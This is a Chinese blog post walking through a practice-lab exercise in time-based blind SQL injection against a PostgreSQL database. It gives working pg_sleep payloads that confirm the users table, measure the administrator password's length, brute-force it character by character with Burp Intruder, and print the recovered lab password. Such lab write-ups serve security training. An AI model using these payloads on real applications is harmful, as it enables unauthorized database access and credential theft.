sql注入靶场案例报错型注入—时间型盲注

大家可能会有一个问题,如果应用程序捕获了这个报错并正常处理了呢,这该怎么处理,这样的情况下服务器的响应和正常的报错不会有任何区别,那我们就没办法了吗?

那我们就可以使用 如 sleep() 这样的函数,去让SQL语句执行的时间变长,从而导致服务器响应的时间会与正常请求有明显的差异,这也就成为了我们用来判断是否存在注入点的条件。

正文开始

1、老样子,同样是在注入点开始尝试 单引号测试,后台对报错进行了处理,响应并没有任何区别
2、那就试试延时注入,由于我们并不知道后台使用的是什么数据库,所以我们就都试一下,由于需要使用 分号 闭合原有语句,所以我们需要用到 “%3B” 代替 “;”
在这里插入图片描述
1、我们可以判断出这是一个 PostgreSQL 数据库,

2、下面就让我们测试SQL语句吧,先测一下条件查询,payload '%3Bselect case when (1=1) then pg_sleep(5) else null end--+

3、下面加入表判断,payload '%3Bselect case when (username='administrator') then pg_sleep(10) else pg_sleep(0) end from users--+

结尾

可见是存在 users 这个表的,并且里面也确实有 administrator 这个用户,,那我们就需要看一下它的长度是多少了,测试长度为20,逐一尝试
payload '%3Bselect case when (username='administrator' and length(password) = 20) then pg_sleep(3) else pg_sleep(0) end from users--+

知道密码是 20 位之后,就可以开始爆破密码了,
payload '%3Bselect case when (username='administrator' and substring(password,1,1)='1') then pg_sleep(3) else pg_sleep(0) end from users--+,由于 intruder 的配置问题这里唯一不同的是需要在 Attack 中打开 columns 的 ‘Response received’ 选项,来查看他们的延迟时间

密码 ‘f6vrn5gyoqed1v9k9fm9’

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晚来的棠棠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值